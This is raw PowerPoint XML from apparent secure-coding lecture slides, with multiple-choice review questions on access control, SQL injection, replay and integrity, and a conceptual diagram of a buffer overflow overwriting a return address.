              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Positive check or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>Allowlist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Negative check or Blocklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Integrity Checking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77827">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A03B2B0E-FF31-4FFF-AB2B-5E2AFD89D9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51E64A3-6808-4947-8324-E8C8FA13E27D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    The BEST implementation of Access Control would be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Do not provide caches for sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Always use minimal possible permissions in code, for as short of a time as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Avoid using cookies and hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Never provide an authorization above ‘guest’ to web users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79875">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EAC1A0E2-B14B-444B-A335-B9338AF0371E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{714283A9-D59A-4663-8FCA-C4C5D06579CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>     SQL Injection is BEST protected against by using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Cleartext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Encryption and Integrity Checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Clearly defined code such as UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1"/>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80899">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B677A3E3-5B59-42AC-894D-5E38DDC52D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E165A1-7278-49EF-9A48-73EE2762FD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>     The main way to avoid replay between a client and server is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Integrity checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Positive check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Negative check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Nonce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78851">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03CE40CE-6373-4D89-B05F-51F740A14FCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66B3762-F3C8-4C24-8043-0F3B7590041A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>     An issue that could cause the MOST problems includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Hard-coded password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Uninitialized variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Denial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Chatty error message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8192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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7992A26A-A800-4273-B7F6-9D8CC4DAB0AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12324" name="Group 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9EF3EA-656F-47B6-B665-D4C62686A976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1981200"/>
          <a:ext cx="4114800" cy="4392612"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="19050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tblGrid>
              <a:tr h="777897">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Name</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Zzzzzzzzzz</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val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="77631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Count</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49, 425,222</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val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="777897">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State:</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84</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val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="103025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Return</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address</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0x246625</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val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="103025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Frame</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pointer</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>0x246625</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val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10263" name="Text Box 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6852F8EB-901C-469A-8B4E-9E91C74B0BC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3432175"/>
            <a:ext cx="4398963"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2400" b="1"/>
              <a:t>Enter Name:  Zzzzzzzzzzzzzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1"/>
              <a:t>   zzzzzzzzzzzzzzzzzzzzzzzzzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1"/>
              <a:t>   zzzzzzzzzzzzzzzzzzzzzzzzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1"/>
              <a:t>   zzzzzzzzzzzzzzzzzzzz</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10264" name="Picture 37" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64851B1-014D-4C66-BA2C-E6150898E9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7620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5" name="Picture 38" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCD0D69-A5B4-4E15-AB4A-D78A037381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7620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6" name="Picture 39" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EAA9127-99E5-4F2A-A25F-F1679C5632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762000"/>
            <a:ext cx="9906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32A96A14-E654-4395-BE03-F668AD875466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03634C5A-18AF-4A79-B8B7-DE02AE8E5E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>     The BEST way to ensure no message modification occurs is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Positive check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Negative check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Encryption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43011">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4C444CB4-088D-4CA2-ABD3-D47BD6F54720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2831552-BA8B-415E-9A49-4E75B8110CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>     All of the following EXCEPT which answer can result in invalid data AND break-in?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Non-random random number generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Uninitialized variables resulting in error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Race conditions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83971">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8F4C5-FB7B-41DE-94D1-C3BD85443DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Health First Case Study</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E455A9E-A819-4266-B9B8-B505A7342EAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5105400"/>
            <a:ext cx="7772400" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3"/>
